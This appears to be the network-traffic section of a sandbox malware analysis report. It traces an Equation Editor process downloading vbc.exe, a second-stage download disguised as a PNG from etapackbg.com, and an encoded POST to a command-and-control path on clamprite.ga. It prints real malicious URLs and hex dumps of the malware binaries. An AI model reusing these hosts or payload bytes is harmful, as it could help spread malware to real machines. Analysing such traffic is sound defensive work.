                                                                                                  Feb 26, 2022 09:31:16.229867935 CET8.8.8.8192.168.2.220xe897No error (0)clamprite.ga80.66.64.174A (IP address)IN (0x0001)
                                                                                                  Feb 26, 2022 09:31:16.251480103 CET8.8.8.8192.168.2.220xe897No error (0)clamprite.ga80.66.64.174A (IP address)IN (0x0001)

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • 192.210.218.119
                                                                                                  • etapackbg.com
                                                                                                  • clamprite.ga

                                                                                                  HTTP Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  0192.168.2.2249165192.210.218.11980C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Feb 26, 2022 09:30:05.842253923 CET2OUTGET /22/vbc.exe HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                  Host: 192.210.218.119
                                                                                                  Connection: Keep-Alive
                                                                                                  Feb 26, 2022 09:30:06.020068884 CET3INHTTP/1.1 200 OK
                                                                                                  Date: Sat, 26 Feb 2022 08:30:05 GMT
                                                                                                  Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                  Last-Modified: Fri, 26 Nov 2021 11:12:31 GMT
                                                                                                  ETag: "30000-5d1af2ad7b20b"
                                                                                                  Accept-Ranges: bytes
                                                                                                  Content-Length: 196608
                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: application/x-msdownload
                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4b 5f 14 99 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 38 00 00 00 c6 02 00 00 00 00 00 2e 56 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 03 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e0 55 00 00 4b 00 00 00 00 60 00 00 80 c2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 36 00 00 00 20 00 00 00 38 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 80 c2 02 00 00 60 00 00 00 c4 02 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 03 00 00 02 00 00 00 fe 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 56 00 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 30 00 00 84 24 00 00 03 00 00 00 01 00 00 06 24 55 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 36 00 00 00 01 00 00 11 00 28 01 00 00 0a 8c 04 00 00 01 28 02 00 00 0a 00 28 04 00 00 06 28 03 00 00 0a 6f 04 00 00 0a 00 28 06 00 00 06 00 28 08 00 00 06 00 16 0a 38 00 00 00 00 06 2a 00 00 22 02 28 05 00 00 0a 00 2a 00 00 00 ee 00 d0 0a 00 00 01 28 06 00 00 0a 72 01 00 00 70 17 8d 0b 00 00 01 25 16 d0 0a 00 00 01 28 06 00 00 0a a2 28 07 00 00 0a 14 17 8d 01 00 00 01 25 16 02 50 a2 6f 08 00 00 0a 26 2a 13 30 04 00 2e 00 00 00 02 00 00 11 00 73 09 00 00 0a 25 72 11 00 00 70 6f 0a 00 00 0a 00 25 72 19 00 00 70 6f 0b 00 00 0a 00 25 17 6f 0c 00 00 0a 00 0a 38 00 00 00 00 06 2a 00 00 22 02 28 05 00 00 0a 00 2a 00 00 00 1b 30 03 00 54 00 00 00 03 00 00 11 00 00 20 00 0c 00 00 28 0d 00 00 0a 00 00 dd 08 00 00 00 26 00 00 dd 00 00 00 00 72 35 00 00 70 28 0e 00 00 0a 6f 0f 00 00 0a 6f 10 00 00 0a 73 11 00 00 0a 20 d7 5e 5b 05 6f 12 00 00 0a 0a 12 00 28 03 00 00 06 00 28 13 00 00 0a 06 6f 14 00 00 0a 26 2a 01 10 00 00 00 00 01 00 12 13 00 08 01 00 00 01 22 02 28 05 00 00 0a 00 2a 00 00 00 13 30 04 00 b4 00 00 00 04 00 00 11 00 00 28 13 00 00 0a 6f 15 00 00 0a 0a 16 0b 38 96 00 00 00 06 07 9a 0c 00 08 6f 16 00 00 0a 0d 16 13 04 38 74 00 00 00 09 11 04 9a 13 05 11 05 6f 17 00 00 0a 72 7d 00 00 70 28 18 00 00 0a 13 06 11 06 39
                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELK_08.V `@ `@UK`@ H.text46 8 `.rsrc`:@@.reloc@@BVH0$$U06((((o((8*"(*(rp%((%Po&*0.s%rpo%rpo%o8*"(*0T (&r5p(oos ^[o((o&*"(*0(o8o8tor}p(9
                                                                                                  Feb 26, 2022 09:30:06.020101070 CET5INData Raw: 4e 00 00 00 00 11 05 6f 19 00 00 0a 13 07 16 13 08 38 31 00 00 00 11 07 11 08 9a 13 09 11 09 6f 1a 00 00 0a 72 b9 00 00 70 28 18 00 00 0a 13 0a 11 0a 39 0a 00 00 00 11 09 14 14 6f 08 00 00 0a 26 11 08 17 58 13 08 11 08 11 07 8e 69 3f c4 ff ff ff
                                                                                                  Data Ascii: No81orp(9o&Xi?Xi?Xi?a*"(*&(*0?~9"rp(os~8*0~8*"
                                                                                                  Feb 26, 2022 09:30:06.020128012 CET6INData Raw: 04 7e 0a 00 00 04 20 e5 76 32 a3 20 02 00 00 00 62 20 78 52 7c a7 61 7d 4a 00 00 04 7e 0a 00 00 04 20 37 68 0c de 20 03 df 5e cb 58 20 ba e1 d7 d8 58 20 fe 83 1f fa 61 7d 2b 00 00 04 7e 0a 00 00 04 20 2d bc 0d 97 65 20 74 06 c8 68 61 7d 64 00 00
                                                                                                  Data Ascii: ~ v2 b xR|a}J~ 7h ^X X a}+~ -e tha}d~ UY |2a}~ _J c T)a}P~ 7h ^X X (Ca}]~ c !Y Hua}F~ c ua}%~
                                                                                                  Feb 26, 2022 09:30:06.020149946 CET7INData Raw: 84 d7 0c 65 59 20 07 a0 af cd 61 7d 5a 00 00 04 7e 0a 00 00 04 20 50 f0 2f 67 20 03 00 00 00 63 20 0a fe e5 0c 61 7d 41 00 00 04 7e 0a 00 00 04 20 c7 9c 1b b5 20 a0 b6 e0 55 59 20 20 41 40 34 61 7d 6d 00 00 04 7e 0a 00 00 04 20 21 c5 13 bd 65 65
                                                                                                  Data Ascii: eY a}Z~ P/g c a}A~ UY A@4a}m~ !ee !a}s~ U| qX 9Ma}'~ cf FPa}u~ 5 #nX \!Y va}V~ !ee Va}Q~ _ +]X C?a}6~ -e
                                                                                                  Feb 26, 2022 09:30:06.020191908 CET9INData Raw: 32 00 06 00 81 01 32 00 06 00 87 01 32 00 06 00 9e 01 32 00 06 00 ba 01 c5 01 06 00 d7 01 32 00 06 00 de 01 c5 01 0a 00 27 02 2d 01 0a 00 45 02 59 02 0a 00 79 02 59 02 0a 00 8e 02 59 02 0a 00 ac 02 59 02 06 00 ca 02 d1 02 06 00 db 02 d1 02 06 00
                                                                                                  Data Ascii: 22222'-EYyYYY2)2tH7W7u-8Sgg2&-C7^w
                                                                                                  Feb 26, 2022 09:30:06.020215034 CET10INData Raw: 23 00 03 00 34 23 00 00 00 00 91 18 41 04 5a 00 03 00 3c 23 00 00 00 00 13 00 f5 14 5a 00 03 00 00 00 01 00 7c 01 00 00 01 00 17 04 21 00 03 01 12 00 29 00 16 01 17 00 39 00 40 01 1c 00 39 00 57 01 23 00 09 00 63 01 23 00 59 00 8c 01 2e 00 59 00
                                                                                                  Data Ascii: #4#AZ<#Z|!)9@9W#c#Y.Y5y>Ac#AOAOATdciotcy1?YPq]YiYcc#Uc)c#cV
                                                                                                  Feb 26, 2022 09:30:06.020241976 CET11INData Raw: 00 42 69 6e 61 72 79 52 65 61 64 65 72 00 52 65 61 64 42 79 74 65 73 00 41 70 70 44 6f 6d 61 69 6e 00 67 65 74 5f 43 75 72 72 65 6e 74 44 6f 6d 61 69 6e 00 4c 6f 61 64 00 41 73 73 65 6d 62 6c 79 00 43 6c 6f 6e 65 4d 61 70 70 69 6e 67 00 42 6f 6f
                                                                                                  Data Ascii: BinaryReaderReadBytesAppDomainget_CurrentDomainLoadAssemblyCloneMappingBooleanGetAssembliesGetExportedTypesget_FullNameop_EqualityGetMethodsMemberInfoget_Name_ConnectionResourceManagerSystem.ResourcesmanagerCultureInfoSyst
                                                                                                  Feb 26, 2022 09:30:06.020318985 CET13INData Raw: 61 61 64 34 35 30 00 6d 5f 35 38 63 39 62 35 32 31 30 35 37 31 34 34 31 37 61 30 36 31 34 34 33 34 30 39 64 64 31 32 38 35 00 6d 5f 65 30 62 65 38 64 63 62 38 64 63 30 34 34 61 36 39 61 64 36 34 63 38 31 35 63 66 64 66 36 39 35 00 6d 5f 66 33 65
                                                                                                  Data Ascii: aad450m_58c9b52105714417a061443409dd1285m_e0be8dcb8dc044a69ad64c815cfdf695m_f3e3e45ebd47484694edcc15f848d5bam_54489a2ce09d4159858fe5c7886a1824m_1a19aff74fd04b1592fe28594737318em_8d9009c3f4d94a739e10672fbee76be5m_7f6ad5219789466b959ac8c6
                                                                                                  Feb 26, 2022 09:30:06.020345926 CET14INData Raw: 5f 31 62 61 37 34 33 31 39 34 65 39 37 34 39 63 35 39 39 36 61 33 32 39 33 38 31 35 62 34 62 64 63 00 6d 5f 64 34 34 30 33 62 30 61 32 63 61 38 34 38 31 39 61 64 30 36 61 34 61 38 32 31 39 36 66 31 38 64 00 6d 5f 36 31 30 65 66 31 36 31 32 30 35
                                                                                                  Data Ascii: _1ba743194e9749c5996a3293815b4bdcm_d4403b0a2ca84819ad06a4a82196f18dm_610ef161205e407f925bdb1dff1e77a1m_6930ea7ef95f4319bf3c8c10a7fef113m_492c70f869184348b1e257cb5dfa6d58m_1130aaf7f091444581ec5496724afaafm_50e2fdd5e7fc44fc9c195ec81b5176b1
                                                                                                  Feb 26, 2022 09:30:06.020415068 CET16INData Raw: 36 30 33 62 32 34 36 63 38 38 36 63 39 64 37 31 66 62 39 39 32 33 34 31 61 00 6d 5f 30 62 30 61 37 33 31 62 36 63 35 32 34 65 34 31 61 39 63 39 34 63 32 64 35 34 31 37 39 34 62 63 00 6d 5f 30 33 30 35 32 63 63 61 62 36 62 34 34 38 63 36 62 36 39
                                                                                                  Data Ascii: 603b246c886c9d71fb992341am_0b0a731b6c524e41a9c94c2d541794bcm_03052ccab6b448c6b69637a44a155defm_baa87d6433134117a37c9222330c214cm_0c2b3ee5e58a4e2db751baa94d2caf77m_91f2e3aec6fd42a390059c5be92c7bdbm_a395db16af8b4a5eaa5b174e1863c87cm_ddf14
                                                                                                  Feb 26, 2022 09:30:06.191654921 CET17INData Raw: 75 72 63 65 73 00 00 0f 52 00 65 00 76 00 65 00 72 00 73 00 65 00 00 07 63 00 6d 00 64 00 00 1b 2f 00 63 00 20 00 74 00 69 00 6d 00 65 00 6f 00 75 00 74 00 20 00 32 00 30 00 00 47 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 65 00 74 00 61 00 70 00
                                                                                                  Data Ascii: urcesReversecmd/c timeout 20Ghttp://etapackbg.com/css/Sngggz.png;Apwjojdzaicrizygsmmd.ZpaxmptxFlcpjsitpi7Mdydxd.Properti


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  1192.168.2.2249166172.67.166.4980C:\Users\Public\vbc.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Feb 26, 2022 09:30:31.331469059 CET207OUTGET /css/Sngggz.png HTTP/1.1
                                                                                                  Host: etapackbg.com
                                                                                                  Connection: Keep-Alive
                                                                                                  Feb 26, 2022 09:30:31.387427092 CET209INHTTP/1.1 200 OK
                                                                                                  Date: Sat, 26 Feb 2022 08:30:31 GMT
                                                                                                  Content-Type: image/png
                                                                                                  Content-Length: 657920
                                                                                                  Connection: keep-alive
                                                                                                  cache-control: public, max-age=604800
                                                                                                  expires: Sat, 05 Mar 2022 08:30:31 GMT
                                                                                                  last-modified: Fri, 25 Feb 2022 00:36:02 GMT
                                                                                                  x-turbo-charged-by: LiteSpeed
                                                                                                  CF-Cache-Status: MISS
                                                                                                  Accept-Ranges: bytes
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=13EkrpERGHHYGm1xK8r4Cp9OwNDRLiSQbhYayyD61cVzc6XC0k7Q3VDaE5B5vouzdThwtyVnr1K0dKgKtl7VN3iNm151LZ2KX%2BZbn%2FqARES5YaxVEZSSvfPRE8E5lI1Y"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 6e37cfd5d8379968-FRA
                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                  Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 31 40 00 00 00 0c 00 0a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  Data Ascii: 1@
                                                                                                  Feb 26, 2022 09:30:31.387454987 CET210INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 35 00 36 00 34 00 36 00 2e 00 31 00 39 00 30 00 38 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00
                                                                                                  Data Ascii: 5646.1908.0.1noisreV ylbmessAD5646.1908.0.1noisreVtcudorP@emaNtcudorP"lld.dmmsgyzir
                                                                                                  Feb 26, 2022 09:30:31.387474060 CET211INData Raw: 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 04 c7 4d 62 18 08 f1 7b 86 eb 86 d3 91 2a d7 d2 bb bd 3a f2 35 f7 53 7e 82 4e 08
                                                                                                  Data Ascii: Mb{*:5S~NC,o~O]}e[Y9#C*)"DVe|90'(~pK`KD8ma"q9B*LgoEZ7!DS/]
                                                                                                  Feb 26, 2022 09:30:31.387492895 CET213INData Raw: 2e 18 17 b5 a2 82 49 c3 68 85 c3 c3 99 d0 67 27 58 e4 35 3e 70 d7 38 d2 09 ad f7 cd d0 09 37 e2 1d fd 0f ed e3 82 73 ee bd ef 5e 0d 0e 72 a1 59 a5 bb c3 77 d0 5a 75 b2 79 c5 01 81 48 d2 aa 17 f6 3a 6a cb 69 1b c6 30 18 17 3f b0 13 9a 86 d0 cb 7c
                                                                                                  Data Ascii: .Ihg'X5>p87s^rYwZuyH:ji0?|});2S4k]EUPb,)NIb-M/H*3bb``R)*,O,(JKKH``d\^\LoOH]HU#,B(gE m
                                                                                                  Feb 26, 2022 09:30:31.387510061 CET214INData Raw: 0a 17 9b 52 aa 5b a6 29 40 a5 3c 17 e6 cf 79 1b ba ea 54 e2 aa dc f2 2f d8 49 eb 29 18 47 5e 24 da e8 53 20 55 e0 1c 33 ad 91 9f 05 34 e8 b8 d6 d3 46 16 3b 0b 73 c6 1b 93 74 d8 c0 32 1d d1 2b c0 7c 16 7f dd 4b d2 34 e4 ee 86 05 e2 dc 2c 5e 01 48
                                                                                                  Data Ascii: R[)@<yT/I)G^$S U34F;st2+|K4,^H'O}Bm7vef19J#3W`$S^nUk&A89J_S]Jjs.ZFy-$lz%GpsYT$,3JC.4'Ws}t|fMR
                                                                                                  Feb 26, 2022 09:30:31.387526989 CET215INData Raw: b7 f2 38 f6 49 f4 69 68 62 29 36 b1 5f 9b 1c 15 e8 71 d3 4a 43 2c 11 8f 44 37 f3 d7 a0 04 34 81 06 ed f0 35 58 03 ba 28 4d 35 a8 30 d5 94 a9 fd 04 3b c2 3e 57 4a 41 a1 68 1b cc 3c 54 59 a1 07 17 08 a5 ec 11 76 ba ea 04 08 53 9d 76 df 4d 21 63 2c
                                                                                                  Data Ascii: 8Iihb)6_qJC,D745X(M50;>WJAh<TYvSvM!c,yc't8=(6v*uI I:x:H>YzAFxDkP$~*x]*X_=d#$%uX&G:sBA<,84hL`-\Qqz0x
                                                                                                  Feb 26, 2022 09:30:31.387543917 CET217INData Raw: e1 b8 05 70 04 c4 9e 67 76 f0 c1 c0 19 87 f2 71 6a b9 dc bd 36 80 ef f4 2b 67 fa aa 03 f2 58 d0 cb 03 8c 4a 93 bb ef 04 c0 5b d0 cd 26 df a3 68 ec b5 01 6d e8 a5 29 e1 58 80 04 ba d9 4c 0e 3b 4c 73 11 40 a1 46 b8 51 69 16 2d 63 8d af a1 06 f0 a3
                                                                                                  Data Ascii: pgvqj6+gXJ[&hm)XL;Ls@FQi-ck@?E<:s^G7GVqk*j{(f`0?o~yJrFix}U` V?tueK[lzVKZs#9oWkat#W~W7YPS
                                                                                                  Feb 26, 2022 09:30:31.387559891 CET218INData Raw: c1 6c 69 e6 b0 85 17 c0 a6 e9 d8 bd 8e 6f 27 9e 92 07 2f 64 dd cd 76 1d 2b 0d 07 bd 11 c4 9e 8d 50 c6 05 9b ed 83 a6 99 a0 d0 74 c9 a3 0b 81 6c 03 7b 98 cd b5 b1 95 17 c0 8a 05 f3 9c be 60 e4 5a 40 eb b4 01 c6 bc df 3a 02 a0 b4 bc 19 8c 74 8f b0
                                                                                                  Data Ascii: lio'/dv+Ptl{`Z@:t~[Y}6S]K* Ew&]4$$f>xWst11}NeZ3s@P;Libhtg$FPLnFi>GWHQ+>\&Nc7#
                                                                                                  Feb 26, 2022 09:30:31.387578964 CET220INData Raw: 36 01 8b be bf 80 45 dd a0 28 db 5e 11 1f 55 4b 3b 6a d0 c7 f3 21 27 aa 4b 5c 4b a5 74 59 07 3d b1 1e d0 5b 54 2c 1f 22 cb 1f 61 0f 3e 1e 03 7c 55 3c 3b 5c 32 f5 33 3f 2a c1 4e b9 bf d2 1c 7b 42 e9 cf b8 fb 13 00 98 be 37 c7 eb c8 44 f5 e2 6f c2
                                                                                                  Data Ascii: 6E(^UK;j!'K\KtY=[T,"a>|U<;\23?*N{B7Do0`{%}OvjVcpp6%<nNX<F`yI4dAaPiTbcm+!ymp7w~Fg;w;M!F'O9F
                                                                                                  Feb 26, 2022 09:30:31.387597084 CET221INData Raw: 8a c5 c0 6c b5 9a b6 7f 41 7b d8 bf 70 0c f3 5d fe 04 03 0f 61 eb 2f ab fb 33 d2 f2 41 e9 fc c2 27 e2 99 e6 b8 a7 b0 4d c6 74 be ff 13 b4 46 d4 2f 5a f0 c8 5e a8 b0 47 46 be e3 13 d5 02 71 d1 77 f4 34 f7 e2 2c a0 06 09 5b ff 0e ee e6 d2 8d 7c 8d
                                                                                                  Data Ascii: lA{p]a/3A'MtF/Z^GFqw4,[|3do|tg!nOOOCSR]wii.Zdt4Ic^wmrn[:dJ3N_oC%:%W+@7hj)$~;,Xm-
                                                                                                  Feb 26, 2022 09:30:31.387614965 CET222INData Raw: 03 3b 7e 8d f3 c8 d3 51 85 db c3 cd 0d e1 08 cb 87 2e ce 86 89 99 18 80 85 6c b6 de bd 4a c7 97 02 cb da 21 da 47 d2 4c df c0 da 02 b8 72 83 c7 de c1 10 68 f5 54 8d 76 d1 84 00 ad 3c 21 20 cd f4 25 38 84 d8 8a 1e fa eb 6b 25 02 61 50 e1 60 80 0f
                                                                                                  Data Ascii: ;~Q.lJ!GLrhTv<! %8k%aP` !M#37AGuIxNTV,7#]Iyy~kBb>'iJsxO?3t?+='\zu;l9XBK/]U%J;I


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  2192.168.2.224916780.66.64.17480C:\Users\Public\vbc.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Feb 26, 2022 09:31:16.392199039 CET893OUTPOST /azo01/index.php HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                                                                                  Host: clamprite.ga
                                                                                                  Content-Length: 105
                                                                                                  Cache-Control: no-cache
                                                                                                  Data Raw: 00 00 00 26 66 96 42 11 8b 30 64 8b 30 62 ec 26 66 99 40 70 9c 47 70 9d 30 70 9d 37 70 9d 30 14 8b 30 67 eb 40 70 9d 35 70 9c 47 16 8b 30 65 8b 30 63 8b 30 65 8b 30 67 ed 41 70 9d 36 70 9c 47 70 9d 3a 70 9d 3a 70 9d 37 70 9d 37 13 8b 30 65 8b 30 60 8b 30 6d 8b 31 11 8b 30 6d ea 26 66 9a 45 70 9d 36 10 8b 30 67 ed
                                                                                                  Data Ascii: &fB0d0b&f@pGp0p7p00g@p5pG0e0c0e0gAp6pGp:p:p7p70e0`0m10m&fEp60g
                                                                                                  Feb 26, 2022 09:31:17.243398905 CET894INHTTP/1.1 200 OK
                                                                                                  Date: Sat, 26 Feb 2022 08:31:16 GMT
                                                                                                  Server: Apache/2.4.6 (CentOS) PHP/5.6.40
                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                  Connection: close
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Data Raw: 34 34 34 32 66 65 0d 0a 3f 36 90 4f 06 dd 71 1e d7 70 27 e5 7a 26 dc 48 22 9e 48 07 c9 68 2d ed 50 03 f8 56 65 f8 50 00 e8 49 05 fc 68 39 e3 51 06 fb 75 07 e9 55 2f cf 30 07 d8 60 14 c5 72 19 c0 51 61 ca 40 22 df 4f 38 fc 75 0c 9d 64 26 e5 6a 60 d9 59 12 f7 70 1e c7 36 61 cc 4b 18 e4 4e 2f ef 74 18 ea 42 1f e5 74 3e da 40 04 9e 48 06 ff 68 2d e3 47 1c db 4e 01 e7 36 19 c4 46 65 e3 7a 61 9b 4e 01 de 62 04 ff 33 1e 92 2c 36 90 3f 3b 90 aa 40 f7 2f f0 b8 1e 23 0f 08 48 cc a4 42 fb 2f fe a4 5d 27 09 0a 00 82 a7 01 b3 33 b0 fb 1d 30 0a 0a 5f e2 91 a0 9e 01 9d cb 33 50 66 66 65 50 34 30 9e ba 9d cb 33 54 66 66 65 ef cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 17 cb 30 9e 0c 82 71 3d 54 d2 6f a8 8e 73 31 d2 cf bc 9f 5b 3d 15 46 15 dd a4 57 ec 63 f0 eb 50 35 08 08 0a db eb 52 fb 22 ef be 5d 74 0f 08 45 eb 84 63 be 6f f2 af 56 7a 6b 6b 6f 8b cb 30 9e 02 9d cb 33 8f 0b 6d a4 30 c7 55 0c 9d 91 ae a1 cb 6a 03 f7 43 a5 55 0d 9c 91 ae a1 b8 08 07 f6 32 c7 55 0c ee f3 51 a1 ca 6a 03 f7 43 a5 57 0d 9c 91 ae a1 06 0f 05 0d 30 c7 55 0c 52 d8 cb 33 18 67 64 65 2e 71 12 32 02 9d cb 33 54 66 66 65 4f cb 32 bf 09 9c c5 39 54 60 66 65 af cf 30 9e 02 9d cb 33 54 66 66 65 af db 30 9e 02 bd cb 33 54 66 66 75 af db 30 9e 02 9f cb 33 5e 66 66 65 a5 cb 30 9e 08 9d cb 33 54 66 66 65 af fb 30 9e 02 9f cb 33 58 2c 66 65 ac cb 70 9b 02 9d cf 33 54 76 66 65 af cb 20 9e 02 8d cb 33 54 66 66 65 bf cb 30 9e 02 8c cb 33 7f 65 66 65 af cb 30 9e 02 9d cb 33 54 46 66 65 5f c8 30 9e 02 9d cb 33 54 66 66 65 af c7 30 9e 3a a0 cb 33 54 66 66 65 af cb 30 9e 02 8d cb 33 00 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 81 bf 55 e6 76 9d cb 33 7f 62 66 65 af db 30 9e 02 9b cb 33 54 64 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 8f cb 30 fe 2c ef b8 41 37 66 66 65 5f c8 30 9e 02 bd cb 33 54 62 66 65 af c3 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 42 9d cb 73 54 66 66 65 2e 71 12 32 02 9d cb 33 56 66 66 65 94 cb 30 9e 56 8d cb 33 00 64 66 65 af cb 30 9e 83 27 e9 9f 54 66 66 65 a2 cb 30 9e 66 9d cb 33 c4 76 66 65 3f c9 30 9e 02 9d cb 33 d5 dc 44 c9 af cb 30 9e 12 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 06 35 22 36 e2 89 f5 5d d0 3d fe 3e 13 df 5e f3 88 68 54 6b 03 9d cb 33 35 16 0f 48 c2 b8 1d e9 6b f3 e6 50 3b 14 03 48 cc a4 5e ed 6d f1 ae 1e 38 57 4b 54 82 fb 1e ee 66 ff cb 33 54 66 66 65 af db 30 9e 56 9d cb 33 7a 14 02 04 db aa 30 9e 56 8d cb 33 f8 66 66 65 81 b9 54 ff 76 fc ef 49 2e 1c 02 07 c8 cb 30 9e 02 8c cb 33 7f 65 66 65 81 ae 54 ff 76 fc cb 33 54 46 66 65 cf cb 30 9e 2c ef b8 41 37 42 56 54 af cb 30 9e 62 bd cb 33 c4 65 66 65 81 b9 43 ec 61 b9 fb 01 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 83 27 e9 9f 54 66 66 65 1b da 30 9e 03 9d cb 33 5a 66 66 65 a1 cb 30 9e 2a 8c cb 33 34 77 66 65 37 da 30 9e e6 8c cb 33 53 74 66 65 83 d9 30 9e 55 8f cb 33 c5 74 66 65 65 d9 30 9e f0 8f cb 33 4e 75 66 65 e8 d8 30 9e 6d 8e cb 